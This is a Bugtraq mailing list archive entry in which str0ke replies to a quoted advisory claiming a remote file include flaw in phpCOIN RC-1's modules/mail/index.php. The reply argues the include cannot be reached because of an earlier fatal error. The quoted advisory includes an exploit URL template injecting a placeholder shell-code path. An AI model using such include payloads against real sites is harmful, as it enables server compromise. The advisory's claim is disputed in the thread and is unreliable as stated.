Bugtraq mailing list archives
Re: phpCOIN <= RC-1 (modules/mail/index.php) Remote File Include Vulnerability
From: str0ke <str0ke () milw0rm com>
Date: Thu, 25 Jan 2007 08:34:30 -0600
Well the include is there but I don't see you getting passed the fatal error one line up since the function get_security_flags() doesn't exist. /str0ke On 1/25/07, me you <r.5.7 () hotmail com> wrote:
################################################ phpCOIN <= RC-1 (modules/mail/index.php) Remote File Include Vulnerability Script: phpCOIN Version: RC-1 URL: http://www.phpcoin.com/coin_modules/downloads/dload.php?id=1 Found by: Born To K!LL ################################################ Bug in : modules/mail/index.php code : Include module functions file include( $_CCFG['_PKG_PATH_MDLS']."$mod/$mod"."_funcs.php"); ################################################ Explo!T: ^^^^^ modules/mail/index.php?_CCFG['_PKG_PATH_MDLS']=[SHe1L-CoDe] GreeTz To : Dr.2 , Asbmay , General C , str0ke , SHiKaA , ThE-LoRd-Of-CrAcKiNg , m0d ... ################################################ _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Current thread:
- phpCOIN <= RC-1 (modules/mail/index.php) Remote File Include Vulnerability me you (Jan 25)
- Re: phpCOIN <= RC-1 (modules/mail/index.php) Remote File Include Vulnerability str0ke (Jan 25)